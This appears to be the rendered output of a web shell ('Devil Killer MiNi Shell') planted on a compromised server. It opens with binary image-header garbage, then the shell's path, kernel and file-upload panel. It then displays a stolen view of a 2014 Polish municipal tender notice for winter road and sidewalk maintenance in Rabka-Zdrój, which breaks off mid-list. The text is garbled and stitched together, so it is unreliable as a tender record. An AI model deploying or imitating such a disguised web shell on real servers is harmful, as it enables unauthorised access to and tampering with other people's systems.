JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141203/250151-N-2014.html

<p class="kh_header"><b>Rabka-Zdrój: Kompleksowe zimowe utrzymanie dróg, chodników oraz ciągów pieszych na terenie miasta i gminy Rabka-Zdrój w sezonie zimowym, w latach 2014 - 2015 - II postępowanie</b><br>
<b>Numer ogłoszenia: 250151 - 2014; data zamieszczenia: 03.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Rabce-Zdroju , ul. Parkowa 2, 34-700 Rabka-Zdrój, woj. małopolskie, tel. 18 2676440, 2677178.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rabka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zimowe utrzymanie dróg, chodników oraz ciągów pieszych na terenie miasta i gminy Rabka-Zdrój w sezonie zimowym, w latach 2014 - 2015 - II postępowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowe zimowe utrzymanie dróg, chodników, ciągów pieszych, poboczy oraz zatok autobusowych na terenie miasta i gminy Rabka - Zdrój w sezonie zimowym, w latach 2014 - 2015. 
Zimowe utrzymanie dróg (dalej: ZUD) obejmuje wykonanie czynności, których celem jest zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego wywołanych takimi zjawiskami jak opady śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni.

Zamówienie podzielone jest na Części.

Zakres prac jest opisany dla poszczególnych Części. 

Wykonawca w ramach niniejszego postępowania zobowiązuje się do 24 - ro godzinnej dyspozycyjności w stosunku do Zamawiającego w zakresie przyjęcia zgłoszenia i wykonania robót objętych umową. 
Wykonawca musi zapewnić ciągły kontakt telefoniczny z Zamawiającym.

Zamawiający będzie żądał od Wykonawcy posiadania środków łączności telefonicznej dla komunikowania się pracownika Urzędu Miejskiego w Rabce - Zdroju - Koordynatora ZUD lub jego zastępcę, z kierowcami pracującymi w terenie.

Do odśnieżania oraz usuwania śliskości mogą być stosowane wyłącznie maszyny drogowe zarejestrowane oraz posiadające dopuszczenie do ruchu na drogach publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 
a) dla Części I: 5 000,00 PLN (słownie: pięć tysięcy złotych 00/100 PLN) 
b) dla Części II: 5 000,00 PLN (słownie: pięć tysięcy złotych 00/100 PLN)
c) dla Części III: 1 000,00 PLN (słownie: jeden tysiąc złotych 00/100 PLN)
d) dla Części IV: 500,00 PLN (słownie: pięćset złotych 00/100 PLN)
e) dla Części V: 500,00 PLN (słownie: pięćset złotych 00/100 PLN)
f) dla Części VI: 1 000,00 PLN (słownie: jeden tysiąc złotych 00/100 PLN)
g) dla Części VII: 500,00 PLN (słownie: pięćset złotych 00/100 PLN)
h) dla Części VIII: 500,00 PLN (słownie: pięćset złotych 00/100 PLN)

2. Wadium należy wnieść w terminie przed terminem składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Wykonawca spełni warunek jeżeli złoży oświadczenie wg wzoru do niniejszej SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. 
Wykonawca spełni warunek posiadania wiedzy i doświadczenia jeżeli wykaże realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, usługi odpowiadające swoim rodzajem stanowiącym przedmiot zamówienia, tj. zimowe utrzymanie terenów:
a) dla części I min. dwie usługi 40 000,00 zł. (brutto) - każda usługa,
b) dla części II min. dwie usługi 40 000,00 zł. (brutto) - każda usługa,
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Wykonawca spełni warunek jeżeli złoży oświadczenie wg wzoru do niniejszej SIWZ.
Wykonawca spełni warunek jeżeli wykaże, że dysponuje następującym potencjałem technicznym:
a)	dla części I: piaskarka z pługiem (min. 2 szt.), koparko-ładowarka (min. 1 szt.), ciągnik z pługiem oraz rozsypywacz (min. 2 szt.);
b)	dla części II: pługopiaskarka przeznaczona do utrzymania chodników (min. 2 szt.), ciągnik (lub pojazd przeznaczony do odśnieżania chodników) 
z pługiem wraz z rozsypywaczem (min. 2 szt.);
c)	dla części od III do VIII - ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz (min. 1 szt.), koparko-ładowarka (min. 1 szt.);

Jeżeli Wykonawca przewiduje składanie ofert na więcej niż jedną część musi wykazać dysponowanie odpowiednią ilością potencjału technicznego wymaganego dla poszczególnych części.

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
Wykonawca spełni warunek jeżeli złoży oświadczenie wg wzoru do niniejszej SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. 
Wykonawca spełni warunek jeżeli złoży oświadczenie wg wzoru do niniejszej SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie: 
a) dla części I min. dwie usługi 40 000,00 zł. (brutto) - każda usługa,
b) dla części II min. dwie usługi 40 000,00 zł. (brutto) - każda usługa,;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony, podpisany formularz ofertowy wraz z załącznikami.
2. Potwierdzenie wpłaty wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach:
- zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy,
- zmiany kluczowych specjalistów: np. osób reprezentujących Strony (w szczególności: choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne) przedstawionych w umowie - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej,
- wydłużenia terminu wykonania zamówienia z uwagi na wystąpienie niesprzyjających warunków pogodowych nie pozwalających na wykonanie zamówienia zgodnie z warunkami wykonania określonymi w Specyfikacjach Technicznych lub wystąpienia innych okoliczności niezależnych od Wykonawcy,
- zmian teleadresowych Stron umowy określonych w umowie,
- zmianie uległy stawki podatku VAT,
- w przypadku ujawnienia niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym z inwentaryzacją, urządzeń obcych i konieczności wykonania robót związanych z ich zabezpieczeniem lub przełożeniem,
- zawieszenia usługi przez Zamawiającego,
- wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy te zmiany są korzystne dla zamawiającego,
- siły wyższej. 
2. Wszelkie zmiany wymagają zachowania formy pisemnej w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rabka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rabce-Zdroju
ul. Parkowa 2 
34-700 Rabka-Zdrój

pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2014 godzina 11:00, miejsce: Urząd Miejski w Rabce-Zdroju
ul. Parkowa 2 
34-700 Rabka-Zdrój

Sekretariat, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg, poboczy oraz zatok autobusowych na terenie miasta Rabka-Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odśnieżanie: 
- ulic,
- poboczy,
- osiedli: Orkana, Chopina, Szebesty, Traczykówka, Słoneczna Skarpa, Słoneczna,
- zatok parkingowych: przy ul. Parkowej, koło Poczty, plac BUS ul. Jana Pawła II, 
przy ul. Zakopiańska, przy ul. Orkana, 
- zatoki BUS,
- placu targowego Rynek,    
 
Wykaz ulic oraz terenów zimowego utrzymania wg Załącznika do SIWZ 
Wykaz ulic - dla Części I

2. Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) monitorowanie i kontrolowanie stanu nawierzchni jezdni ulic na obsługiwanych trasach i przekazywanie bieżących informacji Zamawiającemu o występujących zjawiskach, 
5) prowadzenie dyżurów dyspozytorskich.
3. Wykaz wymaganego sprzętu przewidzianego dla Części I:
1) piaskarka z pługiem - min. 2 szt. 
2) koparko-ładowarka - min. 1 szt. 
3) ciągnik z pługiem oraz rozsypywacz - min. 2 szt.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie chodników, ciągów pieszych, na terenie miasta Rabka-Zdrój..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zimowe utrzymanie chodników, ciągów pieszych oraz pozostałych terenów, na terenie miasta Rabka-Zdrój zgodnie z Załącznikiem do SIWZ - Wykaz chodników oraz ciągów pieszych.  

Wykaz chodników, ciągów pieszych wg Załącznika do SIWZ Wykaz chodników i ciągów pieszych - dla Części II

3. Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) monitorowanie i kontrolowanie stanu nawierzchni na obsługiwanych trasach 
i przekazywanie bieżących informacji Zamawiającemu o występujących zjawiskach, 
5) prowadzenie dyżurów dyspozytorskich.

4.Wykaz wymaganego sprzętu przewidzianego dla Części II:
1) pługopiaskarka przeznaczona do utrzymania chodników - min. 2 szt. 
2) ciągnik (lub pojazd przeznaczony do odśnieżania chodników) z pługiem wraz z rozsypywaczem - min. 2 szt.
Dopuszczalna masa całkowita sprzętu przewidzianego dla części II nie może 
przekroczyć 5 ton.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
Uwaga! W przypadku braku możliwości odśnieżania mechanicznego usługę należy wykonać ręcznie!

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie przejezdności na terenie DZIELNICY SŁONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie dróg bocznych, dojazdowych do osiedli na terenie Dzielnicy Słone: 
- ul. Poniatowskiego od mostu na Słonce koło wyciągu, łącznie z mostem;
- ul. Zgody;
- Aleja Tysiąclecia od Beskidu w górę;
- ul. Wójtowiczowa;
- ul. Rabskich; do Mlekodaja; 
- droga do D.W. Wiosna;
- rola Ogielówka, Sołtysówka, Zającówna, Jurcowa, Krężelówka;
- Miśkowcówka;
- Plaskówka, Ślusarczykowa, Filasówka, do Rogowca;
- ul. Gorczańska;
- ul. Gorczańska - Bydłoniówka;
- ul. Gorczańska pozostałe rozwidlenia drogi; 
- ul. Polna od skrzyżowania z Gorczańską;
- Osiedle Luberdówka I, Luberdówka II;
- boczna ul. Poniatowskiego: do nr 76 a, do nr 90 a, do nr 268;
- boczna ul. Wójtowiczowej;
- Szkoła Podstawowa nr 3 - dojazd od ulicy Poniatowskiego;
- boczna Poniatowskiego do Dewajtisu w górę koło Słonki;
- boczna ul. Poniatowskiego do nr 259 a;

Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) prowadzenie dyżurów dyspozytorskich.

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca.
Wykaz wymaganego sprzętu przewidzianego dla Części III:
1) ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz - min. 1 szt.
2) koparko-ładowarka - min. 1 szt. 

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zimowe utrzymanie przejezdności na terenie DZIELNICY ZARYTE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie chodnika oraz drogi boczne, dojazdowe do osiedli: 
- Michałówka;
- Rapaczówka Górna i Rapaczówka Dolna I, Rapaczówka Dolna II; Rapaczówka (szlak niebieski);
- Janowa, Janowa II, Panoskowa;
- Śmietanowa;
- Folwark (do Łopatowskiego);
- Osiedle Morgi;
- droga do kościoła oraz Za Torem do mostu włącznie;
- Osiedle Gackówka;
- Osiedle Biernatówka - (górna, po płytach do numeru 136 c);
